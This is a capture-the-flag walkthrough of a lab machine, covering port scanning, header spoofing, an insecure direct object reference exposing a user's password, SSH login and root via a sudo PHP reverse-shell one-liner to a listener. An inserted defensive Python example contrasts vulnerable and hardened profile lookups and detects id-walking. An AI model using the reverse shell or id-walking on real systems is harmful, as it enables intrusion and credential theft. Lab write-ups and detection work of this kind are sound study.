We start by scanning the host with nmap (all TCP ports, OS and service detection, verbose output):
nmap -A -T4 -p- 192.168.1.3 -vv
Running dirb gave us three directories. One of them is robots.txt, which points at a new directory containing a text file, /heyhoo.txt.
The X-Forwarded-For header has to be added to the request, which we can do by intercepting it in Burp Suite.
After hitting Forward, a new company page shows up for us.
We can fill the information required in the registration page
After registering yourself, take a look at the address bar: you will find you got an id number (mine was 12). I changed it to 1 and got a different, already registered username. I kept changing it until 5, where I got Alice's username and password, which can be read in the page source.
Username: alice, password: 4lic3
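The bug above is a classic insecure direct object reference: the profile id comes from the URL, nothing ties it to the logged-in user, and the whole record (password included) is rendered. As an added example that is not code from the write-up or the target application (the user table, field names and access-log format are all constructed assumptions), here is the vulnerable lookup beside a hardened one, plus a small detector for sessions that walk through ids the way the write-up does:

```python
from __future__ import annotations
import re
from collections import defaultdict

# Constructed sample user table standing in for the app's database.
# Column names and hash values are placeholders, not from the target.
USERS = {
    1: {"username": "bob", "email": "bob@example.invalid", "password_hash": "<hash-1>"},
    5: {"username": "alice", "email": "alice@example.invalid", "password_hash": "<hash-5>"},
    12: {"username": "newuser", "email": "new@example.invalid", "password_hash": "<hash-12>"},
}
PUBLIC_FIELDS = ("username", "email")  # the only columns a profile page may render


class Forbidden(Exception):
    """Raised when a user requests a profile that is not their own."""


def vulnerable_profile(requested_id: int) -> dict | None:
    """The pattern behind the write-up's bug: the id is trusted as-is and the
    full row, password column included, goes straight to the template."""
    return USERS.get(requested_id)


def hardened_profile(session_user_id: int, requested_id: int) -> dict:
    """Ownership check first, then a whitelist of fields that may be shown."""
    if requested_id != session_user_id:
        raise Forbidden(f"user {session_user_id} may not view profile {requested_id}")
    row = USERS.get(requested_id)
    if row is None:
        raise KeyError(requested_id)
    return {field: row[field] for field in PUBLIC_FIELDS}


def is_forbidden(session_user_id: int, requested_id: int) -> bool:
    """Helper so callers can test the access decision without try/except."""
    try:
        hardened_profile(session_user_id, requested_id)
    except Forbidden:
        return True
    return False


# Constructed access-log format assumed for the detector below.
LOG_RE = re.compile(r"session=(\S+) GET /profile\?id=(\d+)")


def detect_id_walking(log_lines: list[str], threshold: int = 3) -> dict[str, list[int]]:
    """Return sessions that requested more than `threshold` distinct profile ids."""
    seen: dict[str, set[int]] = defaultdict(set)
    for line in log_lines:
        match = LOG_RE.search(line)
        if match:
            seen[match.group(1)].add(int(match.group(2)))
    return {s: sorted(ids) for s, ids in seen.items() if len(ids) > threshold}
```

The detector only counts distinct ids per session, so a user reloading their own profile is never flagged, while one session stepping through ids 1 to 5 is.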
Now we can log in to her account over SSH with those credentials.
Right!! Now all we need is to run a PHP one-liner through sudo that connects back to our nc listener (192.168.1.11, port 443), and it's easy:
sudo /usr/bin/php -r '$sock=fsockopen("192.168.1.11",443);exec("/bin/sh -i <&3 >&3 2>&3");'